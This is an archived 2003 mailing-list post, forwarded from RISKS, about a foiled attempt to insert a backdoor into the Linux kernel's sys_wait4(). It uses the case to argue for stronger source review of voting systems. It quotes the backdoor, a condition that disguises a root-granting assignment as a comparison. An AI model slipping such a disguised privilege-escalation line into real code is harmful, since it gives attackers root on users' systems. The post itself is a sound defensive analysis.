[Politech] How a backdoor in the Linux kernel was thwarted, from RISKS

From: Declan McCullagh (declan@private)
Date: Wed Nov 12 2003 - 12:31:04 PST

  • Next message: Declan McCullagh: "[Politech] VeriSign replies to Politech post over Flash-based "Trust Mark""

    ---
    
    Date: Tue, 11 Nov 2003 09:21:16 -0600
    From: "Douglas W. Jones" <jones@private>
    Subject: Thwarted Linux backdoor
    
    On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
    Linux was averted.  This is a really good example of the subtle kinds of
    hacks a source code examiner must be waiting to catch if we want genuinely
    secure voting systems under the current model of proprietary DRE systems
    with a closed-door source code examination.
    
    Someone broke into a server at kernel.kbits.net and inserted the following
    code into the Linux kernel:
    
             if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                             retval = -EINVAL;
    
    This was done in the code sys_wait4().  Larry McVoy caught the fact that the
    change had been made, and was annoyed because it wasn't logged properly.
    Matthew Dharm asked "Out of curiosity, what were the changed lines."  Zwane
    Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
    you hope to get root."
    
    So, an annoying violation of the software change logging requirements turned
    out to be an attempt to install a backdoor in Linux.  At least two very
    experienced programmers looked at it and saw just slightly odd code, before
    the serious nature of the threat was actually discovered.
    
    This particular attack, by the way, is ruled out by the current voting
    system standards, not because they require a comprehensive security
    analysis, but because of their C-centered coding rules.  Embedded assignment
    is forbidden.  Current source code checks are good at finding embedded
    assignments and flagging them (as long as the code is written in C).  No
    doubt, a hacker of the sophistication suggested by the attack illustrated
    above would strictly adhere to the coding guidelines in formulating their
    attack.
    
    For the complete story of this attack on Linux, including the actual E-mail
    exchange documenting the discovery of the attack, see:
    
         http://kerneltrap.org/node/view/1584
         Linux: Kernel "Back Door" Attempt
    
    This attack has only made the mainstream media in one place, so far:
    
         http://www.smh.com.au/articles/2003/11/07/1068013371170.html
         Bid to backdoor Linux kernel detected - smh.com.au
    
    This is a pity, because I think this story is really important.
    
    _______________________________________________
    Politech mailing list
    Archived at http://www.politechbot.com/
    Moderated by Declan McCullagh (http://www.mccullagh.org/)
    



    This archive was generated by hypermail 2b30 : Wed Nov 12 2003 - 12:45:54 PST